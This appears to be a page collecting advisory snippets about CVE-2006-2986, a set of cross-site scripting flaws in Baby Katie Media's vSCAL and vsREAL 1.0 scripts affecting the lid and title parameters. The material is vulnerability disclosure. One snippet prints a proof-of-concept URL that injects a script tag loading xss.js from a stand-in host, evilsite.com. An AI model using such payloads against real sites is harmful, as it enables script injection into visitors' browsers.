CVE-2006-2986

Multiple cross-site scripting XSS vulnerabilities in Baby Katie Media a very Simple Car Lister vSCAL 1.0 and b very simple Realty Lister vsREAL 1.0 allow remote attackers to inject arbitrary web script or HTML via the 1 lid parameter in index.php and the 2 title parameter in myslideshow.php...

CVE-2006-2986

CVE-2006-2986 involves multiple XSS vulnerabilities in Baby Katie Media products (a) very Simple Car Lister (vSCAL) 1.0 and (b) very Simple Realty Lister (vsREAL) 1.0. The flaws allow remote attackers to inject arbitrary web script/HTML via the (1) lid parameter in index.php and (2) title paramet...

Baby Katie Media VSReal and VScal 1.0 - 'index.php?lid' Cross-Site Scripting

source: https://www.securityfocus.com/bid/18350/info vsREAL and vSCAL are prone to multiple cross-site scripting vulnerabilities. These issues are due to the applications' failure to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code execute...

Babykatmedia.com scripts - vSCAL & vREAL - XSS Vulns

vSCAL and vREAL v1.0 Homepage: http://www.babykatiemedia.com/ Effected files: index.php myslideshow.php XSS Vulnerability via lid variable: http://www.example.com/vscal/index.php?page=showlisting&lid=SCRIPT20SRC=evilsite.com//xss.js/SCRIPT XSS Vulnerability via myslideshow.php...

Baby Katie Media VSReal and VScal 1.0 - myslideshow.php?title Cross-Site Scripting

Baby Katie Media VSReal and VScal 1.0 - myslideshow.php?title Cross-Site Scripting source: https://www.securityfocus.com/bid/18350/info vsREAL and vSCAL are prone to multiple cross-site scripting vulnerabilities. These issues are due to the applications' failure to properly sanitize user-supplied...